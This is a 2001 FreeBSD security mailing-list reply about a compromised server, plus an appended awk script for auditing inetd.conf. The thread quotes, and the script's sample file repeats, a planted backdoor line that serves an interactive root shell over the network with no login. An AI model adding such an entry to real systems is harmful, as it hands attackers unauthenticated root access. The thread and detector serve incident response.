Re: I got hacked, I think

From: jslivko@4evermail.com
Date: 10/18/01


From: jslivko@4evermail.com <jslivko@4evermail.com>
To: <tomek@mpionline.com>
Date: Thu, 18 Oct 2001 16:31:37 +0000


[CC'd to -security, as this should be discussed there]

Did you have any system snoopers around that you installed (tripwire
and things of that ilk) that you can refer to for time information?
If you can narrow down the time that the files were updated, you
might have found out when the intrusion actually occurred and then,
by grepping that information from "last", you can find out who he
logged in as (assuming he logged in normally the first time). If I
can be of any help, feel free to shoot me an e-mail.

-- Jonathan

--- "Tomek" <tomek@mpionline.com> wrote:
> I found out more info.
>
> -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
> -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
>
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream tcp nowait root /bin/sh sh -i
>
> I take it that "sh" would not even request a login or anything if called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... who did he even login in the first time, maybe it was some
> buffer overflow or something.... yuck.
>
> TY for all your help guys, you are all wonderful! I will leave you in
> peace now (I hope). I still don't know about Broot though...

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
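
A defender's check for the kind of entry quoted in the thread above, added here as an example and not part of the original messages: it flags any active inetd.conf line whose server program or argv[0] is a command interpreter. The function names, the shell list, and the sample file are assumptions constructed for illustration; only the `eklogin` line comes from the post.

```shell
#!/bin/sh
# audit_inetd FILE
# inetd.conf fields: service, socket type, protocol, wait/nowait, user,
# server program, then the argument vector (argv[0] first).
# Prints each active entry that hands the connection to a shell and
# returns 1 if any were found, 0 otherwise.
audit_inetd() {
    awk '
        /^[ \t]*(#|$)/ { next }               # skip comments and blank lines
        NF < 6         { next }               # not a complete service entry
        {
            prog = $6; sub(/.*\//, "", prog)  # basename of server program
            arg0 = (NF >= 7) ? $7 : ""
            sub(/.*\//, "", arg0)             # basename of argv[0]
            if (prog ~ shells || arg0 ~ shells) {
                printf "%s:%d: service=%s user=%s server=%s\n", \
                       FILENAME, FNR, $1, $5, $6
                found = 1
            }
        }
        END { exit found + 0 }
    ' shells='^(sh|csh|tcsh|bash|ksh|zsh)$' "$1"
}

# write_sample FILE
# Constructed sample config: ordinary entries plus the line from the post.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
#telnet stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
daytime stream  tcp     nowait  root    internal
eklogin stream tcp nowait root /bin/sh sh -i
EOF
}

# Run against a file given on the command line, e.g. /etc/inetd.conf.
if [ "$#" -gt 0 ]; then
    audit_inetd "$1"
fi
```

A hit only means the entry deserves a look; it should be compared against a known-good copy of the config, and any inetd.conf found outside /etc (as in the post) checked the same way.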


